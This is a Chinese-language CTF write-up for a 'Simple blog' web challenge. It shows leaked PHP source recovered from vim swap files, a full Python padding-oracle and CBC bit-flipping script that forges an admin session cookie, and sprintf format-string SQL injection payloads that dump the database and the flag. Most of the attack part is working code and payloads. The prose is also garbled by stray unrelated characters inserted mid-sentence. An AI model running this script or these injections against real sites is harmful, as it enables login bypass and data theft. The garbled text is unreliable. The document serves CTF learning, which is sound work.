Simple blog

Task

A simple blog .To discover the secret of it.
http://111.231.111.54/

Solution

源碼泄露

http://111.231.111.54/.login.php.swp
http://111.231.111.54/.admin.php.swp

下載下來后梳猪,用vim -r恢復(fù)棉安,得到源代碼:

login.php

<?php
error_reporting(0);
session_start();
define("METHOD", "aes-128-cbc");
include('config.php');

function show_page(){
    echo '省略';
}

function get_random_token(){
    $random_token = '';
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    for($i = 0; $i < 16; $i++){
        $random_token .= substr($str, rand(1, 61), 1);
    }
    return $random_token;
}

function get_identity(){
    global $id;
    $token = get_random_token();
    $c = openssl_encrypt($id, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("token", base64_encode($token));
    if($id === 'admin'){
        $_SESSION['isadmin'] = 1;
    }else{
        $_SESSION['isadmin'] = 0;
    }
}


function test_identity(){
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        $token = base64_decode($_COOKIE["token"]);
        if($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token)){
            if ($u === 'admin') {
                $_SESSION['isadmin'] = 1;
                return 1;
            }
        }else{
            die("Error!");
        }
    }
    return 0;
}

if(isset($_POST['username'])&&isset($_POST['password'])){
    $username = mysql_real_escape_string($_POST['username']);
    $password = $_POST['password'];
    $result = mysql_query("select password from users where username='" . $username . "'", $con);
    $row = mysql_fetch_array($result);
    if($row['password'] === md5($password)){
        get_identity();
        header('location: ./admin.php');
    }else{
        die('Login failed.');
    }
}else{
    if(test_identity()){
        header('location: ./admin.php');
    }else{
        show_page();
    }
}
?>

admin.php

<?php
error_reporting(0);
session_start();
include('config.php');

if(!$_SESSION['isadmin']){
    die('You are not admin');
}

if(isset($_GET['id'])){
    $id = mysql_real_escape_string($_GET['id']);
    if(isset($_GET['title'])){
        $title = mysql_real_escape_string($_GET['title']);
        $title = sprintf("AND title='%s'", $title);
    }else{
        $title = '';
    }
    $sql = sprintf("SELECT * FROM article WHERE id='%s' $title", $id);
    $result = mysql_query($sql,$con);
    $row = mysql_fetch_array($result);
    if(isset($row['title'])&&isset($row['content'])){
        echo "<h1>".$row['title']."</h1><br>".$row['content'];
        die();
    }else{
        die("This article does not exist.");
    }
}
?>

經(jīng)過測試芯咧,存在賬號和密碼,分別為admin和admin夏醉。在login.php頁面登陸后會跳轉(zhuǎn)到admin.php。默認(rèn)情況下腮鞍,由于并非真實(shí)admin嫌褪,在跳轉(zhuǎn)后會顯示you are not admin.

CBC翻轉(zhuǎn)字節(jié)攻擊

image.png

參考:
初學(xué)Padding Oracle Attack-----重點(diǎn)看這個(gè)
CBC字節(jié)翻轉(zhuǎn)攻擊
CBC字節(jié)翻轉(zhuǎn)攻擊-101Approach

腳本:

import requests
import base64
url='http://111.231.111.54/login.php'
N=16

def inject_token(token):
    header={"Cookie":"PHPSESSID="+phpsession+";token="+token}
    result=requests.post(url,headers=header)
    return result

def xor(a, b):
    return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])

def pad(string,N):
    l=len(string)
    if l!=N:
        return string+chr(N-l)*(N-l)

def padding_oracle(N):
    get=""
    for i in xrange(1,N+1):
        for j in xrange(0,256):
            padding=xor(get,chr(i)*(i-1))
            c=chr(0)*(16-i)+chr(j)+padding
            result=inject_token(base64.b64encode(c))
            if "Error!" not in result.content:
                get=chr(j^i)+get
                break
    return get

def login(url):
    payload = {
        "username":"admin",
        "password":"admin"
    }
    coo1 = {
        "PHPSESSID":"j297k7o6d8stcbvi2c23naj5j6"
    }
    r = requests.post(url,cookies=coo1,data=payload,allow_redirects=False)
    token = r.headers['Set-Cookie'].replace("%3D",'=').replace("%2F",'/').replace("%2B",'+').decode('base64')
    session = "j297k7o6d8stcbvi2c23naj5j6"
    return session, token

while 1:
    phpsession,token = login(url)

    middle1=padding_oracle(N)
    print middle1
    print "\n"
    if(len(middle1)+1==16):
        for i in xrange(0,256):
            middle=chr(i)+middle1
            print "token:"+token
            print "middle:"+middle
            plaintext=xor(middle,token);
            print "plaintext:"+plaintext
            des=pad('admin',N)
            tmp=""
            print des.encode("base64")
            for i in xrange(16):
                tmp+=chr(ord(token[i])^ord(plaintext[i])^ord(des[i]))
            print tmp.encode('base64')
            result=inject_token(base64.b64encode(tmp))
            # print result.content
            if "Login Form" not in result.content and "Error" not in result.content:
                print result.content
                print "success"
                exit()
image.png
image.png

格式化串sql注入

spintf(),是一個(gè)格式化字符串函數(shù)祈搜,傳入的字符可覆蓋自身參數(shù)

參考:
WordPress SQLi談PHP格式化字符串問題
本地測試:

<?php
// 注format中较店,為防止 $ 被轉(zhuǎn)義,在前面加了轉(zhuǎn)義符容燕。對于sprintf來說梁呈,即 %1$s
$format1 = "hello,%1\$s one<br/>";
$format2 = "hello,%2\$s two<br/>";
$format3 = "hello,%1\$\' three<br/>";
$format4 = "hello,%\$\' four<br/>";

print_r("format string 1 : ".$format1);
print_r("Result: ".sprintf($format1,"chybeta-1","chybeta-2"));

print_r("format string 2 : ".$format2);
print_r("Result: ".sprintf($format2,"chybeta-1","chybeta-2"));

print_r("format string 3 : ".$format3);
print_r(sprintf($format3,"chybeta-1","chybeta-2"));

print_r("format string 4 : ".$format4);
print_r(sprintf($format4,"chybeta-1","chybeta-2"));
?>
image.png

前兩個(gè)示例是演示選擇參數(shù)的用法。第三個(gè)和前兩個(gè)比較蘸秘,變成類型%\官卡,會直接跳過不處理,并直接輸出醋虏。第四個(gè)和第三個(gè)對比寻咒,少了參數(shù)選擇,這會導(dǎo)致報(bào)錯(cuò)颈嚼,無法正常打印

通過百分號后的1毛秘,選擇了一個(gè)參數(shù)(即id)不會爆錯(cuò)。利用類型%\阻课,使得跳過叫挟。而原本在\后面的單引號,由于前面斜杠被當(dāng)作了sprintf的類型限煞,得以成功逃逸抹恳。

剩下的工作就是盲注了.

id=3&title=%1$ 'union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname,@@datadir)#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(table_name)) from information_schema.tables where table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(column_name))  from information_schema.columns where table_name=0x6b6579 and table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(f14g)) from web1.key#

數(shù)據(jù)庫:web1
表名:key
字段名:f14g

image.png

小結(jié)

~··源碼泄露
~··CBC翻轉(zhuǎn)字節(jié)攻擊
~··格式化串sql注入

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市署驻,隨后出現(xiàn)的幾起案子奋献,更是在濱河造成了極大的恐慌,老刑警劉巖旺上,帶你破解...
    沈念sama閱讀 206,214評論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件瓶蚂,死亡現(xiàn)場離奇詭異,居然都是意外死亡抚官,警方通過查閱死者的電腦和手機(jī)扬跋,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,307評論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來凌节,“玉大人钦听,你說我怎么就攤上這事洒试。” “怎么了朴上?”我有些...
    開封第一講書人閱讀 152,543評論 0 341
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵垒棋,是天一觀的道長。 經(jīng)常有香客問我痪宰,道長叼架,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,221評論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任衣撬,我火速辦了婚禮乖订,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘具练。我一直安慰自己乍构,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,224評論 5 371
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布扛点。 她就那樣靜靜地躺著哥遮,像睡著了一般。 火紅的嫁衣襯著肌膚如雪陵究。 梳的紋絲不亂的頭發(fā)上眠饮,一...
    開封第一講書人閱讀 49,007評論 1 284
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音铜邮,去河邊找鬼仪召。 笑死,一個(gè)胖子當(dāng)著我的面吹牛牲距,可吹牛的內(nèi)容都是我干的返咱。 我是一名探鬼主播,決...
    沈念sama閱讀 38,313評論 3 399
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼牍鞠,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了评姨?” 一聲冷哼從身側(cè)響起难述,我...
    開封第一講書人閱讀 36,956評論 0 259
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎吐句,沒想到半個(gè)月后胁后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,441評論 1 300
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡嗦枢,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,925評論 2 323
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年攀芯,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片文虏。...
    茶點(diǎn)故事閱讀 38,018評論 1 333
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡侣诺,死狀恐怖殖演,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情年鸳,我是刑警寧澤趴久,帶...
    沈念sama閱讀 33,685評論 4 322
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站搔确,受9級特大地震影響彼棍,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜膳算,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,234評論 3 307
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一座硕、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧涕蜂,春花似錦华匾、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,240評論 0 19
  • 一樁弒父案瘦真,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至黍瞧,卻和暖如春诸尽,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背印颤。 一陣腳步聲響...
    開封第一講書人閱讀 31,464評論 1 261
  • 情欲美人皮
    我被黑心中介騙來泰國打工您机, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人年局。 一個(gè)月前我還...
    沈念sama閱讀 45,467評論 2 352
  • 代替公主和親
    正文 我出身青樓际看,卻偏偏與公主長得像,于是被迫代替她去往敵國和親矢否。 傳聞我的和親對象是個(gè)殘疾皇子仲闽,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,762評論 2 345

推薦閱讀更多精彩內(nèi)容